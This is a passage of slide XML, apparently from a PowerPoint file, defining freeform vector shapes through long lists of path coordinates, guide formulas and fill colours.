                    <a:lnTo>
                      <a:pt x="957" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="940" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="898" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="888" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="871" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="861" y="930"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="937"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="944"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="953"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="993"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="1010"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="1018"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="671" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="648" y="1034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="1032"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="1024"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="1012"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="476" y="1005"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="996"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="994"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="991"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="988"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="985"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="952"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="945"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="939"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="932"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="920"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="916"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="490"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="13"/>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5140" name="Freeform 91"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="413" y="2414"/>
                <a:ext cx="161" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 491"/>
                  <a:gd name="T1" fmla="*/ 0 h 151"/>
                  <a:gd name="T2" fmla="*/ 0 w 491"/>
                  <a:gd name="T3" fmla="*/ 0 h 151"/>
                  <a:gd name="T4" fmla="*/ 0 w 491"/>
                  <a:gd name="T5" fmla="*/ 0 h 151"/>
                  <a:gd name="T6" fmla="*/ 0 w 491"/>
                  <a:gd name="T7" fmla="*/ 0 h 151"/>
                  <a:gd name="T8" fmla="*/ 0 w 491"/>
                  <a:gd name="T9" fmla="*/ 0 h 151"/>
                  <a:gd name="T10" fmla="*/ 0 w 491"/>
                  <a:gd name="T11" fmla="*/ 0 h 151"/>
                  <a:gd name="T12" fmla="*/ 0 w 491"/>
                  <a:gd name="T13" fmla="*/ 0 h 151"/>
                  <a:gd name="T14" fmla="*/ 0 w 491"/>
                  <a:gd name="T15" fmla="*/ 0 h 151"/>
                  <a:gd name="T16" fmla="*/ 0 w 491"/>
                  <a:gd name="T17" fmla="*/ 0 h 151"/>
                  <a:gd name="T18" fmla="*/ 0 w 491"/>
                  <a:gd name="T19" fmla="*/ 0 h 151"/>
                  <a:gd name="T20" fmla="*/ 0 w 491"/>
                  <a:gd name="T21" fmla="*/ 0 h 151"/>
                  <a:gd name="T22" fmla="*/ 0 w 491"/>
                  <a:gd name="T23" fmla="*/ 0 h 151"/>
                  <a:gd name="T24" fmla="*/ 0 w 491"/>
                  <a:gd name="T25" fmla="*/ 0 h 151"/>
                  <a:gd name="T26" fmla="*/ 0 w 491"/>
                  <a:gd name="T27" fmla="*/ 0 h 151"/>
                  <a:gd name="T28" fmla="*/ 0 w 491"/>
                  <a:gd name="T29" fmla="*/ 0 h 151"/>
                  <a:gd name="T30" fmla="*/ 0 w 491"/>
                  <a:gd name="T31" fmla="*/ 0 h 151"/>
                  <a:gd name="T32" fmla="*/ 0 w 491"/>
                  <a:gd name="T33" fmla="*/ 0 h 151"/>
                  <a:gd name="T34" fmla="*/ 0 w 491"/>
                  <a:gd name="T35" fmla="*/ 0 h 151"/>
                  <a:gd name="T36" fmla="*/ 0 w 491"/>
                  <a:gd name="T37" fmla="*/ 0 h 151"/>
                  <a:gd name="T38" fmla="*/ 0 w 491"/>
                  <a:gd name="T39" fmla="*/ 0 h 151"/>
                  <a:gd name="T40" fmla="*/ 0 w 491"/>
                  <a:gd name="T41" fmla="*/ 0 h 151"/>
                  <a:gd name="T42" fmla="*/ 0 w 491"/>
                  <a:gd name="T43" fmla="*/ 0 h 151"/>
                  <a:gd name="T44" fmla="*/ 0 w 491"/>
                  <a:gd name="T45" fmla="*/ 0 h 151"/>
                  <a:gd name="T46" fmla="*/ 0 w 491"/>
                  <a:gd name="T47" fmla="*/ 0 h 151"/>
                  <a:gd name="T48" fmla="*/ 0 w 491"/>
                  <a:gd name="T49" fmla="*/ 0 h 151"/>
                  <a:gd name="T50" fmla="*/ 0 w 491"/>
                  <a:gd name="T51" fmla="*/ 0 h 151"/>
                  <a:gd name="T52" fmla="*/ 0 w 491"/>
                  <a:gd name="T53" fmla="*/ 0 h 151"/>
                  <a:gd name="T54" fmla="*/ 0 w 491"/>
                  <a:gd name="T55" fmla="*/ 0 h 151"/>
                  <a:gd name="T56" fmla="*/ 0 w 491"/>
                  <a:gd name="T57" fmla="*/ 0 h 151"/>
                  <a:gd name="T58" fmla="*/ 0 w 491"/>
                  <a:gd name="T59" fmla="*/ 0 h 151"/>
                  <a:gd name="T60" fmla="*/ 0 w 491"/>
                  <a:gd name="T61" fmla="*/ 0 h 151"/>
                  <a:gd name="T62" fmla="*/ 0 w 491"/>
                  <a:gd name="T63" fmla="*/ 0 h 151"/>
                  <a:gd name="T64" fmla="*/ 0 w 491"/>
                  <a:gd name="T65" fmla="*/ 0 h 151"/>
                  <a:gd name="T66" fmla="*/ 0 w 491"/>
                  <a:gd name="T67" fmla="*/ 0 h 151"/>
                  <a:gd name="T68" fmla="*/ 0 w 491"/>
                  <a:gd name="T69" fmla="*/ 0 h 151"/>
                  <a:gd name="T70" fmla="*/ 0 w 491"/>
                  <a:gd name="T71" fmla="*/ 0 h 151"/>
                  <a:gd name="T72" fmla="*/ 0 w 491"/>
                  <a:gd name="T73" fmla="*/ 0 h 151"/>
                  <a:gd name="T74" fmla="*/ 0 w 491"/>
                  <a:gd name="T75" fmla="*/ 0 h 151"/>
                  <a:gd name="T76" fmla="*/ 0 w 491"/>
                  <a:gd name="T77" fmla="*/ 0 h 151"/>
                  <a:gd name="T78" fmla="*/ 0 w 491"/>
                  <a:gd name="T79" fmla="*/ 0 h 151"/>
                  <a:gd name="T80" fmla="*/ 0 w 491"/>
                  <a:gd name="T81" fmla="*/ 0 h 151"/>
                  <a:gd name="T82" fmla="*/ 0 w 491"/>
                  <a:gd name="T83" fmla="*/ 0 h 151"/>
                  <a:gd name="T84" fmla="*/ 0 w 491"/>
                  <a:gd name="T85" fmla="*/ 0 h 151"/>
                  <a:gd name="T86" fmla="*/ 0 w 491"/>
                  <a:gd name="T87" fmla="*/ 0 h 151"/>
                  <a:gd name="T88" fmla="*/ 0 w 491"/>
                  <a:gd name="T89" fmla="*/ 0 h 151"/>
                  <a:gd name="T90" fmla="*/ 0 w 491"/>
                  <a:gd name="T91" fmla="*/ 0 h 151"/>
                  <a:gd name="T92" fmla="*/ 0 w 491"/>
                  <a:gd name="T93" fmla="*/ 0 h 151"/>
                  <a:gd name="T94" fmla="*/ 0 w 491"/>
                  <a:gd name="T95" fmla="*/ 0 h 151"/>
                  <a:gd name="T96" fmla="*/ 0 w 491"/>
                  <a:gd name="T97" fmla="*/ 0 h 151"/>
                  <a:gd name="T98" fmla="*/ 0 w 491"/>
                  <a:gd name="T99" fmla="*/ 0 h 151"/>
                  <a:gd name="T100" fmla="*/ 0 w 491"/>
                  <a:gd name="T101" fmla="*/ 0 h 151"/>
                  <a:gd name="T102" fmla="*/ 0 w 491"/>
                  <a:gd name="T103" fmla="*/ 0 h 151"/>
                  <a:gd name="T104" fmla="*/ 0 w 491"/>
                  <a:gd name="T105" fmla="*/ 0 h 151"/>
                  <a:gd name="T106" fmla="*/ 0 w 491"/>
                  <a:gd name="T107" fmla="*/ 0 h 151"/>
                  <a:gd name="T108" fmla="*/ 0 w 491"/>
                  <a:gd name="T109" fmla="*/ 0 h 15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1"/>
                  <a:gd name="T166" fmla="*/ 0 h 151"/>
                  <a:gd name="T167" fmla="*/ 491 w 491"/>
                  <a:gd name="T168" fmla="*/ 151 h 15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1" h="151">
                    <a:moveTo>
                      <a:pt x="158" y="18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="164" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="18"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="CC0A2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5141" name="Freeform 92"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="418" y="2417"/>
                <a:ext cx="61" cy="41"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 189"/>
